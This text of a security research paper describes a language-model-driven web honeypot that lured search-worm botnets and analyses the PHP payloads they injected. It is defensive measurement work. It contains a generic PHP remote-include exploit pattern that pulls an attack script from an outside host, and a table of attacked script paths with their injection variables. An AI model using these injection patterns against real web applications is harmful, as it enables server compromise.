to catch a predator a natural language approach for ... · a natural language approach for...

USENIX Association 17th USENIX Security Symposium 171

To Catch a Predator:A Natural Language Approach for Eliciting Malicious Payloads

Sam SmallJohns Hopkins University

Joshua MasonJohns Hopkins University

Fabian MonroseJohns Hopkins University

Niels ProvosGoogle Inc.

Adam StubblefieldJohns Hopkins University

Abstract

We present an automated, scalable, method for craft-ing dynamic responses to real-time network requests.Specifically, we provide a flexible technique based onnatural language processing and string alignment tech-niques for intelligently interacting with protocols traineddirectly from raw network traffic. We demonstrate theutility of our approach by creating a low-interaction web-based honeypot capable of luring attacks from searchworms targeting hundreds of different web applications.In just over two months, we witnessed over 368, 000attacks from more than 5, 600 botnets targeting severalhundred distinct webapps. The observed attacks includedseveral exploits detected the same day the vulnerabilitieswere publicly disclosed. Our analysis of the payloads ofthese attacks reveals the state of the art in search-wormbased botnets, packed with surprisingly modular and di-verse functionality.

1 Introduction

Automated network attacks by malware pose a signif-icant threat to the security of the Internet. Nowadays,web servers are quickly becoming a popular target forexploitation, primarily because once compromised, theyopen new avenues for infecting vulnerable clients thatsubsequently visit these sites. Moreover, because webservers are generally hosted on machines with signifi-cant system resources and network connectivity, they canserve as reliable platforms for hosting malware (particu-larly in the case of server farms), and as such, are entic-ing targets for attackers [25]. Indeed, lately we have wit-nessed a marked increase in so-called “search worms”that seek out potential victims by crawling the resultsreturned by malevolent search-engine queries [24, 28].While this new change in the playing field has been notedfor some time now, little is known about the scope of thisgrowing problem.

To better understand this new threat, researchers andpractitioners alike have recently started to move towardsthe development of low-interaction, web-based honey-pots [3]. These differ from traditional honeypots in thattheir only purpose is to monitor automated attacks di-rected at vulnerable web applications. However, web-based honeypots face a unique challenge—they are in-effective if not broadly indexed under the same queriesused by malware to identify vulnerable hosts. At thesame time, the large number of different web applica-tions being attacked poses a daunting challenge, and thesheer volume of attacks calls for efficient solutions. Un-fortunately, current web-based honeypot projects tendto be limited in their ability to easily simulate diverseclasses of vulnerabilities, require non-trivial amounts ofmanual support, or do not scale well enough to meet thischallenge.

A fundamental difference between the type of mal-ware captured by traditional honeypots (e.g., Hon-eyd [23]) and approaches geared towards eliciting pay-loads from search-based malware stems from how poten-tial victims are targeted. For traditional honeypots, thesesystems can be deployed at a network telescope [22], forexample, and can simply take advantage of the fact thatfor random scanning malware, any traffic that reachesthe telescope is unsolicited and likely malicious in na-ture. However, search-worms use a technique more akinto instantaneous hit-list automation, thereby only target-ing authentic and vulnerable hosts. Were web-based hon-eypots to mimic the passive approach used for traditionalhoneypots, they would likely be very ineffective.

To address these limitations, we present a method forcrafting dynamic responses to on-line network requestsusing sample transcripts from observed network inter-action. In particular, we provide a flexible techniquebased on natural language processing and string align-ment techniques for intelligently interacting with proto-cols trained directly from raw traffic. Though our ap-proach is application-agnostic, we demonstrate its util-

172 17th USENIX Security Symposium USENIX Association

ity with a system designed to monitor and capture au-tomated network attacks against vulnerable web appli-cations, without relying on static vulnerability signa-tures. Specifically, our approach (disguised as a typicalweb server) elicits interaction with search engines and,in turn, search worms in the hope of capturing their il-licit payload. As we show later, our dynamic contentgeneration technique is fairly robust and easy to deploy.Over a 72-day period we were attacked repeatedly, andwitnessed more than 368,000 attacks originating from28,856 distinct IP addresses.

The attacks target a wide range of web applications,many of which attempt to exploit the vulnerable appli-cation(s) via a diverse set of injection techniques. Toour surprise, even during this short deployment phase,we witnessed several attacks immediately after publicdisclosure of the vulnerabilities being exploited. That,by itself, validates our technique and underscores boththe tenacity of attackers and the overall pervasivenessof web-based exploitation. Moreover, the relentless na-ture of these attacks certainly sheds light on the scope ofthis problem, and calls for immediate solutions to bettercurtail this increasing threat to the security of the Inter-net. Lastly, our forensic analysis of the captured pay-loads confirms several earlier findings in the literature, aswell as highlights some interesting insights on the post-infection process and the malware themselves.

The rest of the paper is organized as follows. Sec-tion 2 discusses related work. We provide a high-leveloverview of our approach in Section 3, followed byspecifics of our generation technique in Section 4. Weprovide a validation of our approach based on interactionwith a rigid binary protocol in Section 5. Additionally,we present our real-world deployment and discuss ourfindings in Section 6. Finally, we conclude in Section 7.

2 Related Work

Generally speaking, honeypots are deployed with the in-tention of eliciting interaction from unsuspecting adver-saries. The utility in capturing this interaction has beendiverse, allowing researchers to discover new patternsand trends in malware propagation [28], generate newsignatures for intrusion-detection systems and Internetsecurity software [16, 20, 31], collect malware binariesfor static and/or dynamic analysis [21], and quantify ma-licious behavior through widespread measurement stud-ies [26], to name a few.

The adoption of virtual honeypots by the security com-munity only gained significant traction after the introduc-tion of low-interaction honeypots such as Honeyd [23].Honeyd is a popular tool for establishing multiple virtualhosts on a single machine. Though Honeyd has provedto be fairly useful in practice, it is important to recognize

that its effectiveness is strictly tied to the availability ofaccurate and representative protocol-emulation scripts,whose generation can be fairly tedious and time con-suming. High-interaction honeypots use a different ap-proach, replying with authentic and unscripted responsesby hosting sand-boxed virtual machines running com-mon software and operating systems [11]1.

A number of solutions have been proposed to bridgethe separation of benefits and restrictions that exist be-tween high and low-interaction honeypots. For example,Leita et al. proposed ScriptGen [18, 17], a tool that auto-matically generates Honeyd scripts from network trafficlogs. ScriptGen creates a finite state machine for eachlistening port. Unfortunately, as the amount and diver-sity of available training data grows, so does the size andcomplexity of its state machines. Similarly, RolePlayer(and its successor, GQ [10]) generates scripts capable ofinteracting with live traffic (in particular, worms) by ana-lyzing series of similar application sessions to determinestatic and dynamic fields and then replay appropriate re-sponses. This is achieved by using a number of heuris-tics to remove common contextual values from annotatedtraffic samples and using byte-sequence alignment to findpotential session identifiers and length fields.

While neither of these systems specifically targetsearch-based malware, they represent germane ap-proaches and many of the secondary techniques they in-troduce apply to our design as well. Also, their respectivedesigns illustrate an important observation—the choicebetween using a small or large set of sample data man-ifests itself as a system tradeoff: there is little diversityto the requests recognized and responses transmitted byRolePlayer, thereby limiting its ability to interact withparticipants whose behavior deviates from the trainingsession(s). On the other hand, the flexibility provided bygreater state coverage in ScriptGen comes at a cost toscalability and complexity.

Lastly, since web-based honeypots rely on search en-gines to index their attack signatures, they are at a disad-vantage each time a new attack emerges. In our work, wesidestep the indexing limitations common to static signa-ture web-based honeypots and achieve broad query rep-resentation prior to new attacks by proactively generating“signatures” using statistical language models trained oncommon web-application scripts. When indexed, thesesignatures allow us to monitor attack behavior conductedby search worms without explicitly deploying structuredsignatures a priori.

3 High-level Overview

We now briefly describe our system architecture. Itssetup follows the description depicted in Figure 1, whichis conceptually broken into three stages: pre-processing,


Figure 1: Setup consists of three distinct stages conducted in tandem in preparation for deployment.

classification, and language-model generation. We ad-dress each part in turn. We note that although ourmethodology is not protocol specific, for pedagogicalreasons, we provide examples specific to the DNS pro-tocol where appropriate. Our decision to use DNS forvalidation stems from the fact that validating the correct-ness of an HTTP response is ill-defined. Likewise, manyASCII-based protocols that come to mind (e.g., HTTP,SMTP, IRC) lack strict notions of correctness and sodo not serve as a good conduit to demonstrate the cor-rectness of the output we generate.

To begin, we pre-process and sanitize all trace dataused for training. Network traces are stripped of trans-port protocol headers and organized by session into pairsof requests and responses. Any trace entries that cor-respond to protocol errors (e.g., HTTP 404) are omit-ted. Next, we group request and response pairs usinga variant of iterative k-means clustering with TF/IDF(i.e., term frequency-inverse document frequency) co-sine similarity as our distance metric. Formally, weapply a k-medoids algorithm for clustering, which as-signs samples from the data as cluster medoids (i.e., cen-troids) rather than numerical averages. For reasons thatshould become clear later, pair similarity is based solelyon the content of the request samples. Upon completion,we then generate and train a collection of smoothed n-gram language-models for each cluster. These language-models are subsequently used to produce dynamic re-sponses to online requests. However, because messageformats may contain session-specific fields, we also post-process responses to satisfy these dependencies when-ever they can be automatically inferred. For example, inDNS, a session identifier uniquely identifies each recordrequest with its response.

During a live deployment, online-classification is usedto deduce the response that is most similar to the in-coming request (i.e., by mapping the response to its bestmedoid). For instance, a DNS request for an MX recordwill ideally match a medoid that maps to other MX re-

quests. The medoid with the minimum TF/IDF distanceto an online request identifies which language model isused for generating responses. The language models arebuilt in such a way that they produce responses influ-enced by the training data. The overall process is de-picted in Figure 2. For our evaluation as a web-basedhoneypot (in Section 6), this process is used in two dis-tinct stages: first, when interacting with search enginesfor site indexing and second, when courting malware.

4 Under the Hood

In what follows, we now present more specifics aboutour design and implementation. Recall that our goal isto provide a technique for automatically providing validresponses to protocols interactions learned directly fromraw traffic.

In lieu of semantic knowledge, we instead apply clas-sic pattern classification techniques for partitioning a setof observed requests. In particular, we use the iterativek-medoids algorithm. As our distance metric we chooseto forgo byte-sequence alignment approaches that havebeen previously used to classify similarities between pro-tocol messages (e.g, [18, 9, 6]). As Cui et. al. observed,while these approaches are appropriate for classifyingrequests that only differ parametrically, byte-sequencealignment is ill-suited for classifying messages with dif-ferent byte-sequences [8]. Therefore, we use TF/IDFcosine similarity as our distance metric.

Intuitively, term frequency-inverse document fre-quency (TF/IDF) is the measure of a term’s significanceto a string or document given its significance among a setof documents (or corpus). TF/IDF is often used in infor-mation retrieval for a number of applications includingautomatic text retrieval and approximate string match-ing [29]. Mathematically, we compute TF/IDF in thefollowing way: let τdi

denote how often the term τ ap-pears in document di such that di ∈ D, a collection ofdocuments. Then TF/IDF= TF · IDF where


Figure 2: Online classification of requests from malware and search engine spiders influences which language modelis selected for response generation.

TF =√τdi

and

IDF =

�

log|D|

|{dj : dj ∈ D and τ ∈ dj}|

The term-similarity between two strings from thesame corpus can be computed by calculating theirTF/IDF distance. To do so, both strings are first rep-resented as multi-dimensional vectors. For each term ina string (e.g., word), its TF/IDF value is computed asdescribed previously. Then, for a string with n terms, ann-dimensional vector is formed using these values. Thecosine of the angle between two such vectors represent-ing strings indicates a measure of their similarity (hence,its complement is a measure of distance).

In the context of our implementation, terms are delin-eated by tokenizing requests into the following classes:one or more spaces, one or more printable characters (ex-cluding spaces), and one or more non-printable charac-ters (also excluding spaces).2 We chose the space char-acter as a primary term delimiter due to its common oc-currence in text-based protocols; however, the delimitercould have easily been chosen automatically by identi-fying the most frequent byte in all requests. The collec-tion of all requests (and their constituent terms) form theTF/IDF corpus.

Once TF/IDF training is complete we use an iterativek-medoids algorithm, shown in Algorithm 1, to identifysimilar requests. Upon completion, the classification al-gorithm produces a k (or less) partitioning over the setof all requests. In an effort to rapidly classify online re-quests in a memory-efficient manner, we retain only themedoids and dissolve all clusters. For our deployment,we empirically choose k = 30, and then perform a triv-ial cluster-collapsing algorithm: we iterate through the

k clusters and, for each cluster, calculate the mean andstandard deviation of the distance between the medoidand the other members of the cluster. Once the k-meansand standard deviations are known, we collapse pairs ofclusters if the medoid requests are no more than one stan-dard deviation apart.

4.1 Dynamic Response Generation

Since one of the goals of our method is to generate notonly valid but also dynamic responses to requests, weemploy natural language processing techniques (NLP) tocreate models of protocols. These models, termed lan-guage models, assign probabilities of occurrence to se-quences of tokens based on a corpus of training data.With natural languages such as English we might definea token or, more accurately, a 1-gram as a string of char-acters (i.e., a word) delimited by spaces or other punctu-ation. However, given that we are not working with nat-ural languages, we define a new set of delimiters for pro-tocols. The 1-gram token in our model adheres to one ofthe following criteria: (1) one or more spaces, (2) one ormore printable characters, (3) one or more non-printablecharacters, or (4) the beginning of message (BOM) or endof message (EOM) tokens.

The training corpora we use contain both requests andresponses. Adhering to our assumption that similar re-quests have similar responses, we train k response lan-guage models on the responses associated with each ofthe k request clusters. That is, each cluster’s responselanguage model is trained on the packets seen in responseto the requests in that cluster. Recall that to avoid havingto keep every request cluster in memory, we keep onlythe medoids for each cluster. Then, for each (request, re-sponse) tuple, we recalculate the distance to each of thek request medoids. The medoid with the minimal dis-tance to the tuple’s request identifies which of the k lan-guage models is trained using the response. After train-


1: MedoidSet← SelectKRandomElements(ObservedRequests)2: RequestMap < RequestT ype,MedoidType >← ⊥ // for mapping requests to medoids3: repeat4: for all R ∈ (ObservedRequests−MedoidSet) do5: for allM ∈MedoidSet do6: Distance← TF/IDF (R,M)7: if RequestMap[R] = ⊥ or Distance < TF/IDF (RequestMap[R],M) then8: RequestMap[R] ←M9: for allM ∈MedoidSet do

10: M ← FindMemberWithLowestMeanDistance(M,RequestMap)11: until HasConverged(MedoidSet)12: for all (Mi,Mj) ∈MedoidSet s.t. i �= j do13: if TF/IDF (Mi,Mj) < FindThresholdDistance(Mi,Mj) then14: MedoidSet←MedoidSet− {Mi,Mj}15: MedoidSet←MedoidSet ∪Merge(Mi,Mj, RequestMap)

Algorithm 1: Iterative k-Medoids Classification for Observed Requests

ing concludes, each of the k response language modelshas a probability of occurrence associated with each ob-served sequence of 1-grams. A sequence of two 1-gramsis called a 2-gram, a sequence of three 1-grams is called a3-gram, and so on. We cut the maximum n-gram length,n, to eight.

Since it is unlikely that we have witnessed every pos-sible n-gram during training, we use a technique calledsmoothing to lend probability to unobserved sequences.Specifically, we use parametric Witten-Bell back-offsmoothing [30], which is the state of the art for n-grammodels. This smoothing method estimates, if we con-sider 3-grams, the 3-gram probability by interpolatingbetween the naive count ratio C(w1w2w3)/C(w1w2)and a recursively smoothed probability estimate of the 2-gram probability P (w3|w2). The recursively smoothedprobabilities are less vulnerable to low counts because ofthe shorter context. A 2-gram is more likely to occur inthe training data than a 3-gram and the trend progressessimilarly as the n-gram length decreases. By smoothing,we get a reasonable estimate of the probability of occur-rence for all possible n-grams even if we have never seenit during training. Smoothing also mitigates the possibil-ity that certain n-grams dominate in small training cor-pora. It is important to note that during generation, weonly consider the states seen in training.

To perform the response generation, we use the lan-guage models to define a Markov model. This Markovmodel can be thought of as a large finite state machinewhere each transition occurs based on a transition prob-ability rather than an input. As well, each “next state” isconditioned solely on the previous state. The transitionprobability is derived directly from the language models.The transition probability from a 1-gram,w1 to a 2-gram,w1w2 is P (w2|w1), and so on. Intuitively, generation isaccomplished by conducting a probabilistic simulation

from the start state (i.e., BOM) to the end state (i.e., EOM).

More specifically, to generate a response, we performa random walk on the Markov model corresponding tothe identified request cluster. From the BOM state, werandomly choose among the possible next states with theprobabilities present in the language model. For instance,if the letters (B, C,D) can follow A with probabilities(70%, 20%, 10%) respectively, then we will choose theAB path approximately 70% of the time and similarlyfor AC and AD. We use this random walk to create re-sponses similar to those seen in training not only in syn-tax but also in frequency. Ideally, we would produce thesame types of responses with the same frequency as thoseseen during training, but the probabilities used are at the1-gram level and not the response packet level.

The Markov models used to generate responses at-tempt to generate valid responses based on the trainingdata. However, because the training is over the entireset of responses corresponding to a cluster, we cannotrecognize contextual dependencies between requests andresponses. Protocols will often have session identifiersor tokens that necessarily need to be mirrored betweenrequest and response. DNS, for instance, has a two bytesession identifier in the request that needs to appear inany valid response. As well, the DNS name or IP re-quested also needs to appear in the response. While theNLP engine will recognize that some session identifierand domain name should occupy the correct positions inthe response, it is unlikely that the correct session iden-tifier and name will be chosen. For this reason, we au-tomatically post-process the NLP generated response toappropriately satisfy contextual dependencies.

176 17thUSENIXSecuritySymposium USENIXAssociation

Figure 3: A sliding window template traverses requesttokens to identify variable-length tokens that should bereproduced in related responses.

4.1.1 Detecting Contextual Dependencies

Generally speaking, protocols have two classes of con-textual dependencies: invariable length tokens and vari-able length tokens. Invariable length tokens are, as thename implies, tokens that always contain the same num-ber of bytes. For the most part, protocols with vari-able length tokens typically adhere to one of two stan-dards: tokens preceded by a length field and tokens sep-arated using a special byte delimiter. Overwhelmingly,protocols use length-preceded tokens (DNS, Samba,Netbios, NFS, etc.). The other less-common type(as in HTTP) employ variable length delimited tokens.

Our method for handling each of these token types dif-fers only slightly from techniques employed by other ac-tive responder and protocol disassembly techniques ([8,9]). Specifically, we identify contextual dependenciesusing two techniques. First, we apply the Needleman-Wunsch string alignment algorithm [19] to align requestswith their associated responses during training. Since thelanguage models we use are not well suited for this par-ticular task, this process is used to identify if, and where,substrings from a request also appear in its response. Ifcertain bytes or sequences of bytes match over an em-pirically derived threshold (80% in our case), these bytesare considered invariable length tokens and the byte po-sitions are copied from request to response after the NLPgeneration phase.

To identify variable length tokens, we make the sim-plifying assumption that these types of tokens are pre-ceded by a length identifier; we do so primarily becausewe are unaware of any protocols that contain contex-tual dependencies between request and response throughcharacter-delimited variable length tokens. As depictedin Figure 3, we iterate over each request and considereach set of up to four bytes as a length identifier if andonly if the token that follows it belongs to a certain char-acter class3 for the described length. In our example,Tokeni is identified as a candidate length-field basedupon its value. Since the next immediate token is of the

Figure 4: Frequency of dominant type/class per requestcluster (with k = 30), sorted from least to most accurate.

length described by Tokeni (i.e., 8), Tokenj is identi-fied as a variable length token. For each variable lengthtoken discovered, we search for the same token in theobserved response. We copy these tokens after NLP gen-eration if and only if this matching behavior was com-mon to more than half of the request and response pairsobserved throughout training.

As an aside, the content-length header field in ourHTTP responses also needs to accurately reflect the num-ber of bytes contained in each response. If the valueof this field is greater than the number of bytes in aresponse, the recipient will poll for more data, causingtransactions to stall indefinitely. Similarly, if the value ofthe content-length field is less than the number of bytesin the response, the recipient will prematurely halt andtruncate additional data. While other approaches havebeen suggested for automatically inferring fields of thistype, we simply post-process the generated HTTP re-sponse and automatically set the content-length value tobe the number of bytes after the end-of-header character.

5 Validation

In order to assess the correctness of our dynamic re-sponse generation techniques, we validate our overall ap-proach in the context of DNS. Again, we reiterate thatour choice for using DNS in this case is because it isa rigid binary protocol, and if we can correctly gener-ate dynamic responses for this protocol, we believe itaptly demonstrates the strength (and soundness) of ourapproach. For our subsequent evaluation, we train ourDNS responder off a week’s worth of raw network tracescollected from a public wireless network used by approx-imately 50 clients. The traffic was automatically par-


titioned into request and response tuples as outlined inSection 4.

Figure 5: Frequency of dominant type/class per responsecluster (with k = 30), sorted from least to most accurate.

To validate the output of our clustering technique,we consider clustering of requests successful if for eachcluster, one type of request (A, MX, NS, etc.) and the classof the request (IN) emerges as the most dominant mem-ber of the cluster; a cluster with one type and one classappearing more frequently than any other is likely to cor-rectly classify an incoming request and, in turn, generatea response to the correct query type and class. We reportresults based on using 10,000 randomly selected flowsfor training. As Figures 4 and 5 show, nearly all clustershave a dominating type and class.

To demonstrate our response generation’s success rate,we performed 20,000 DNS requests on randomly gen-erated domain names (of varying length). We usedthe UNIX command host4 to request several types ofrecords. For validation purposes, we consider a responseas strictly faithful if it is correctly interpreted by the re-questing program with no warnings or errors. Likewise,we consider a response as valid if it processes correctlywith or without warnings or errors. The results are shownin Figure 6 for various training flow sizes. Notice thatwe achieve a high success rate with as little as 5,000flows, with correctness ranging between 89% and 92%for strictly faithful responses, and over 98% accuracy inthe case of valid responses.

In summary, this demonstrates that the overall designdepicted in Figures 1 and 2—that embodies our train-ing phase, classification phase, model generation, andpreposing phase to detect contextual dependencies andcorrectly mirror the representative tokens in their correctlocation(s)—produces faithful responses. More impor-tantly, these responses are learned automatically, and re-

quire little or no manual intervention. In what follows,we further substantiate the utility of our approach in thecontext of a web-based honeypot.

ValidFaithful

0

0.1

0.2

0.3

0.4

0.5

0.6

0.7

0.8

0.9

1

A MX NS A MX NS A MX NS

1,000 Flows 5,000 Flows 10,000 Flows

Figure 6: Faithful, valid, or erroneous response suc-cess rate for 20,000 random DNS requests under differentnumbers of training flows.

6 Evaluation

Our earlier assertion was that the exploitation of web-apps now pose a serious threat to the Internet. In orderto gauge the extent to which this is true, we used our dy-namic generation techniques to build a lightweightHTTPresponder — in the hope of snatching attack traffic tar-geted at web applications. These attackers query popularsearch engines for strings that fingerprint the vulnerablesoftware and isolate their targets.

Type Appearances

.PHP 3165

.PL 29

.CGI 49

.HTML 15

.PHTML 2

Table 1: Query Types

With this in mind, we obtained a list of the 3,285 ofthe most searched queries on Google by known botnetsattempting to exploit web applications.5 We then queriedGoogle for the top 20 results associated with each query.Although there are several bot queries that are ambigu-ous and are most likely not targeting a specific web ap-plication, most of the queries were targeted. However,automatically determining the number of different webapplications being attacked is infeasible, if not impossi-ble. For this reason, we provide only the break down in


the types of web applications being exploited (i.e., PHP,Perl, CGI, etc.) in Table 1.

Nearly all of the bots searching for these queries ex-ploit command injection vulnerabilities. The PHP vul-nerabilities are most commonly exploited through re-mote inclusion of a PHP script, while the Perl vul-nerabilities, are usually exploited with UNIX delimitersand commands. Since CGI/HTML/PHTML can houseprograms from many different types of underlying lan-guages, they encompass a wide range of exploitationtechniques. The collected data contains raw traces of theinteractions seen when downloading the pages for eachof the returned results. Our corpus contained 178,541TCP flows, of which we randomly selected 24,000 flowsas training data for our real-world deployment (see Sec-tion 6.1).

Since our primary goal here is to detect (and catch)bots using search engines to query strings present in vul-nerable web applications, our responder must be in a po-sition to capture these prey — i.e., it has to be broadlyindexed by multiple search engines. To do so, we firstcreated links to our responder from popular pages,6 andthen expedited the indexing process by disclosing theexistence of a minor bug in a common UNIX applica-tion to the Full-Disclosure mailing list. The bug wedisclosed cannot be leveraged for privilege escalation.Bulletins from Full-Disclosure are mirrored on severalhigh-ranking websites and are crawled extensively bysearch-engine spiders; less than a few hours later, oursite appeared in search results on two prominent searchengines. And, right on queue, the attacks immediatelyfollowed.

6.1 Real-World Deployment

For our real-world evaluation, we deployed our systemon a 3.0 GHz dual-processor Intel Xeon with 8 GB ofRAM. At runtime, memory utilization peaked at 960 MBof RAM when trained with 24,000 flows. CPU utiliza-tion remained at negligible levels throughout operationand on average, requests are satisfied in less than a sec-ond. Because our design was optimized to purposelykeep all data RAM during runtime, disk access was un-necessary.

Shortly after becoming indexed, search-worms beganto attack at an alarming rate, with the attacks rapidlyincreasing over a two month deployment period. Dur-ing that time, we also recorded the number of indexesreturned by Google per day (which totaled just shy of12,000 during the deployment). We choose to only showPHP attacks because of their prominence. Figure 7 de-picts the number of attacks we observed per day. Forreference, we provide annotations of our Google indexcount in ten day intervals until the indices plateau.

Figure 7: Daily PHP attacks. The valley on day 44 is dueto an 8 hr power outage. The peak on day 56 is becausetwo bots launched over 2,000 unique script attacks.

For ease of exposition, we categorize the observed at-tacks into four groups. The first denotes the number of at-tacks targeting vulnerabilities that have distinct file struc-tures in their names. The class “Unique PHP attacks”,however, is more refined and represents the number of at-tacks against scripts but using unique injection variables(i.e., index.php?page= and index.php?inc=).The reason we do so is that the file names and struc-tures can be ubiquitous and so by including the vari-able names we glean insights into attacks against poten-tially distinct vulnerabilities. We also attempt to quan-tify the number of distinct botnets involved in these at-tacks. While many botnets attack the same applica-tion vulnerabilities, (presumably) these botnets can bedifferentiated by the PHP script(s) they remotely in-clude. Recall that a typical PHP remote-include exploit isof the form “vulnerable.php?variable=http://site.com/attack\ script?”, and in practice,botnets tend to use disjoint sites to store attack scripts.Therefore, we associate bots with a particular botnet byidentifying unique injection script repositories. Based onthis admittedly loose notion of uniqueness [27], we ob-served attacks from 5,648 distinct botnets. Lastly, werecord the number of unique IP addresses that attempt tocompromise our responder.

The results are shown in Figure 7. An immediate ob-servation is the sheer volume of attacks—in total, wellover 368,000 attacks targeting just under 45,000 uniquescripts before we shutdown the responder. Interest-ingly, notice that there are more unique PHP attacks thanunique IPs, suggesting that unlike traditional scanningattacks, these bots query for and attack a wide varietyof web applications. Moreover, while many bots attempt


to exploit a large number of vulnerabilities, the repos-itories hosting the injected scripts remain unchangedfrom attack to attack. The range of attacks is perhapsbetter demonstrated not by the number of unique PHPscripts attacked but by the number of unique PHP web-applications that are the target of these attacks.

6.1.1 Unique WebApps

In general, classifying the number of unique web ap-plications being attacked is difficult because some botstarget PHP scripts whose filenames are ubiquitous (e.g.,index.php). In these cases, bots are either targetinga vulnerability in one specific web-application that hap-pens to use a common filename or arbitrarily attemptingto include remote PHP scripts.

To determine if an attack can be linked to a specificweb-application, we downloaded the directory structuresfor over 4,000 web-applications from SourceForge.net.From these directory structures, we matched the webapplication to the corresponding attacked script (e.g.,gallery.php might appear only in the Web Galleryweb application). Next, we associated an attack witha specific web application if the file name appeared inno more than 10 web-app file structures. We choose athreshold of 10 since SourceForge stores several copiesof essentially the same web application under differentnames (due to, for instance, “skin” changes or differentcode maintainers). For non-experimental deploymentsaimed at detecting zero-day attacks, training data couldbe associated with its application of origin, thereby mak-ing associations between non-generic attacks and spe-cific web-applications straightforward.

Based on this heuristic, we are able to map the 24,000flows we initially trained on to 560 “unique” web-applications. Said another way, by simply building ourlanguage models on randomly chosen flows, we wereable to generate content that approximates 560 distinctweb-applications — a feat that is not as easy to achieveif we were to deploy each application on a typical web-based honeypot (e.g., the Google Hack Honeypot [3]).The attacks themselves were linked back to 295 distinctweb applications, which is indicative of the diversity ofattacks.

We note that our heuristic to map content to web-apps is strictly a lower bound as it only identifies web-applications that have a distinct directory structure and/orfile name; a large percentage of web-applications useindex.php and other ubiquitous names and are there-fore not accounted for. Nonetheless, we believe thisserves to make the point that our approach is effectiveand easily deployable, and moreover, provides insightinto the amount of web-application vulnerabilities cur-rently being leveraged by botnets.

6.1.2 Spotting Emergent Threats

While the original intention of our deployment was toelicit interaction from malware exploiting known vulner-abilities in web applications, we became indexed underbroader conditions due to the high amount of variabil-ity in our training data. As a result, a honeypot or ac-tive responder indexed under such a broad set of web ap-plications can, in fact, attract attacks targeting unknownvulnerabilities. For instance, according to milw0rm (apopular security advisory/exploit distribution site), over65 PHP remote inclusion vulnerabilities were releasedduring our two month deployment [1]. Our deploymentbegan on October 27th, 2007 and used the same trainingdata for its entire duration. Hence, any attack exploitinga vulnerability released after October 27th is an attackwe did not explicitly set out to detect.

Nonetheless, we witnessed several emergent threats(some may even consider them “zero-day” attacks) be-cause some of the original queries used to bootstraptraining were generic and happened to represent a widenumber of webapps. As of this writing, we have iden-tified more than 10 attacks against vulnerabilities thatwere undisclosed at deployment time (some examplesare illustrated in Table 2). It is unlikely that we wit-nessed these attacks simply because of arbitrary attemptsto exploit random websites—indeed, we never witnessedmany of the other disclosed vulnerabilities being at-tacked.

We argue that given the frequency with which thesetypes of vulnerabilities are released, a honeypot or an ac-tive responder without dynamic content generation willlikely miss an overwhelming amount of attack traffic—inthe attacks we witnessed, botnets begin attacking vulner-able applications on the day the vulnerability was pub-licly disclosed! An even more compelling case for ourarchitecture is embodied by attacks against vulnerabili-ties that have not been disclosed (e.g., the recent Word-Press vulnerability [7]). We believe that the potential toidentify these attacks exemplifies the real promise of ourapproach.

6.2 Dissecting the Captured Payloads

To better understand what the post-infection process en-tails, we conducted a rudimentary analysis of the re-motely included PHP scripts. Our malware analysis wasperformed on a Linux based Intel virtual machine withthe 2.4.7 kernel. We used a deprecated kernel versionsince newer versions do not export the system call ta-ble of which we take advantage. Our environment con-sisted of a kernel module and a preloaded library7 thatserve to inoculate malware before execution and to loginteresting behavior. The preloaded library captures calls


Disclosure Date Attack Date Signature

2007-11-04 2007-11-10 /starnet/themes/c-sky/main.inc.php?cmsdir=2007-11-21 2007-11-23 /comments-display-tpl.php?language file=2007-11-22 2007-11-22 /admin/kfm/initialise.php?kfm base path=2007-11-25 2007-11-25 /Commence/includes/db connect.php?phproot\ path=2007-11-28 2007-11-28 /decoder/gallery.php?ccms library path=

Table 2: Attacks targeting vulnerabilities that were unknown at time of deployment

to connect() and send(). The connect hook de-ceives the malware by faking successful connections, andthe send function allows us to record information trans-mitted over sockets.8

Our kernel module hooks three system calls: (open,write, and execve). We execute every script undera predefined user ID, and interactions under this ID arerecorded via the open() hook. We also disallow calls toopen that request write access to a file, but feign successby returning a special file descriptor. Attempts to writeto this file descriptor are logged via syslog. Doing soallows us to record files written by the malware withoutallowing it to actually modify the file system. Similarly,only commands whose file names contain a pre-definedrandom password are allowed to execute. All other com-mand executions under the user ID fail to execute (butpretend to succeed), assuring no malicious commandsexecute. Returning success from failed executions is im-portant because a script may, for example, check if acommand (e.g., wget) successfully executes before re-questing the target URL.

To determine the functionality of the individual mal-ware scripts, we batched processed all the captured mal-ware on the aforementioned architecture. From the tran-scripts provided by the kernel module and library, wewere able to discern basic functionality, such as whetheror not the script makes connections, issues IRC com-mands, attempts to write files, etc. In certain cases, wealso conducted more in-depth analyses by hand to un-cover seemingly more complex functionality. We discussour findings in more detail below.

The high-level break-down for the observed scripts isgiven in Table 3. The challenge in capturing bot pay-loads in web application attacks stems from the ease withwhich the attacker can test for a vulnerability; uniquestring displays (where the malware echoes a unique to-ken in the response to signify successful exploitation)accounts for the most prevalent type of injection. Typ-ically, bots parse returned responses for their identifyingtoken and, if found, proceed to inject the actual bot pay-load. Since these unique tokens are unlikely to appearin our generated response, we augment our responder toecho these tokens at run-time. While the use of randomnumbers as tokens seem to be the soup du jour for testing

Script Classification Instances

PHP Web-based Shells 834Echo Notification 591PHP Bots 377Spammers 347Downloaders 182Perl Bots 136Email Notification 87Text Injection 35Java-script Injection 18Information Farming 9Uploaders 4Image Injection 4UDP Flooders 3

Table 3: Observed instances of individual malware

a vulnerability, we observed several instances where at-tackers injected an image. Somewhat comically, in manycases, the bot simply e-mails the IP address of the vulner-able machine, which the attacker then attempts to exploitat a later time. The least common vulnerability test weobserved used a connect-back operation to connect to anattacker-controlled system and send vulnerability infor-mation to the attacker. This information is presumablylogged server-side for later use.

Interestingly, we notice that bots will often inject sim-ple text files that typically also contain a unique identi-fying string. Because PHP scripts can be embedded in-side HTML, PHP requires begin and end markers. Whena text file is injected without these markers, its contentsare simply interpreted as HTML and displayed in the out-put. This by itself is not particularly interesting, but weobserved several attackers injecting large lists of queriesto find vulnerable web applications via search engines.The largest query list we captured contained 7,890 searchqueries that appear to identify vulnerable web applica-tions — all of which could be used to bootstrap our con-tent generation further and cast an even wider net.

Overall, the collected malware was surprisingly mod-ular and offered diverse functionality similar to that re-ported elsewhere [26, 15, 13, 12, 25, 5, 4]. The cap-tured scripts (mostly PHP-based command shells), areadvanced enough that many have the ability to display


